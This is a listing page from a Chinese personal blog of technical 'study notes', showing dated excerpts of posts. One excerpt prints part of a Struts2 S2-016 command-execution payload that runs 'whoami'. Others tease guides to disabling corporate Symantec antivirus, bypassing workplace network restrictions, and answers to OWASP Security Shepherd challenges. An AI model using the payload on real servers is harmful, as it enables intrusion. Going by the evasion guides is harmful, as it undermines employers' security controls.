学习笔记 - 第28页

密码保护：SN — 另类执行Struts2命令及 SQL注入

先说一下Struts2 2013 S2-016的测试payload代码是如下的。 GET /xxxxxxx/rf/userAction!login.action?redirect:$%7B%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27whoami%27%7D%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%...

2017年10月23日学习笔记要查看留言请输入您的密码。喜欢 0 阅读 3,061 views 次阅读全文

dedecms (首页、列表)等页面提取内容中第一张图片代码

在include/extend.func.php 最下方增加下面的代码。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 function Getpic($body) { $getpic = ''; preg_match_all("/(src)=[\"|'| ]{0,}([^>]*\.(gif|jpg|bmp|png))/isU",$body,$img_array); $img_array = array_unique($img_array[2]); if(c...

2017年10月21日学习笔记暂无评论喜欢 0 阅读 2,987 views 次阅读全文

JSONP 跨域请求数据代码(跨域请求数据包)

同事非想看，没办法弄一段代码给对方展示JSONP跨域请求，只要把下面的代码保存到本地，然后打开就可以获取到JSONP的信息。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN&qu...

2017年10月17日学习笔记暂无评论喜欢 0 阅读 2,688 views 次阅读全文

密码保护：域名对应负责人查询系统 php查询脚本

唉，本来工作可以简单，但是就因为都不想干导致很多地方难做，没办法为了自己工作省事，把两步或者三步需要解决的东西合并为一步即可解决。通过如下脚本喽。效果如下图：域名对应负责人查询系统 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58...

2017年10月12日学习笔记要查看留言请输入您的密码。喜欢 0 阅读 2,345 views 次阅读全文

密码保护：关闭Symantec Endpoint Protection企业赛门铁克杀毒还能保持联网

赛门铁克杀毒软件企业版这里必须要啰嗦两句废话，因为我的博客有文章缩略提取，所以很多内容会被提取出来看到。说说自己为什么会这么做吧，主要是本人的工作需要用到很多软件，而很多软件都是那种会被杀毒软件查杀的，但是公司还不给我们这个部门一些绿色通道。真的，服服的，没办法。。。唉。。这个也是但是同事发现然后告诉我的。首先你需要有改动注册表的权限。第一...

2017年09月27日学习笔记要查看留言请输入您的密码。喜欢 3 阅读 3,972 views 次阅读全文

Burp proxy error: unknown host (IP地址unknown host解决方法)

昨天在使用Burp Suite的时候对一个https的网站抓包的时候，居然返回proxy error: unknown host，当时一脸懵逼，因为我所在的工作上网环境太T(变)M(太)的复杂了。而这么复杂的上网环境真心对渗透测试完全不利，很多很多事情超级费劲超级复杂，不过这个过程中也学会了很多东西。话多了。。。。。。。解决方法：修改host文件，把添加域名对应的IP地址。例如我的域名是xxx.xxx...

2017年09月16日学习笔记暂无评论喜欢 3 阅读 11,075 views 次阅读全文

OWASP Security Shepherd (Challenges 挑战) 答案(Answer) 题解

OWASP Security Shepherd 相信你翻遍互联网也没找到答案吧，那恭喜你来对了，看到我这篇文章了，这里我尽可能把所有答案全部列举出来，供你参考使用呦。整个互联网，我给的答案是最全最准的没有之一。如果你有哪道题想知道答案，这里没有，那你可以在下方留言，本人会尽力解答然后告诉你答案的呦。 XSS挑战题解 Cross Site Scripting：跨站脚本 (XSS) 1 ---...

2017年09月07日学习笔记评论 29 条喜欢 16 阅读 34,342 views 次阅读全文

密码保护：手机利用带笔记本绕公司JK上网(一波多折)

大致说一下现在的环境吧。某人单位网络有很大很大的限制，无法连接任何外部IP，上网只能通过代理服务器，代理服务器IP：端口(8080) 的形式。而且很多网页都会被屏蔽。而且公司电脑限制颇多，所以很多东西比想的要复杂的很多很多。现在我用一个图片来简单说明一下我需要做的。现实环境 + 理想环境既然开始咱们就先实施吧。首先第一步，电脑端因为系统是win7 64位，所以需...

2017年09月01日学习笔记要查看留言请输入您的密码。喜欢 4 阅读 2,427 views 次阅读全文

Genymotion 拖动APK文件报错 an error occurred while deploying the file

在新版本的genymotion中，我们拖动安装APK文件的时候会出现一个问题，如下图： an error occurred while deploying the file 首先要准备一个文件，genymotion-arm-translation_v1.1.zip 【诚心诚意的留言，你会得到你想要的东西的。】只有以诚相待，才会不虚此行。命令行进入adb命令工具，cmd执行命令 adb push D:\genymotion-arm-translation_v1.1.zip /sdcard/Download/...

2017年08月30日学习笔记暂无评论喜欢 0 阅读 4,192 views 次阅读全文

Genymotion 运行报错 unable to start the virtual device the virtual device got no ip address 解决方法

今天在运行Genymotion直接弹出报错，然后瞬间懵逼脸，什么情况？？？IP地址？？然后一顿百度找原因。 unable to start the virtual device the virtual device got no ip address 首先这里非常非常建议你安装完整版本的Genymotion下载地址是：https://dl.genymotion.com/releases/genymotion-2.10.0/genymotion-2.10.0-vbox.exe 一定要含有virtualbox，当然了如果你本机有vi...

2017年08月28日学习笔记暂无评论喜欢 1 阅读 5,550 views 次阅读全文

蜗居

窄小蜗居，虽非富贵王侯宅；清闲螺径，也异寻常百姓家。 woj → 蜗居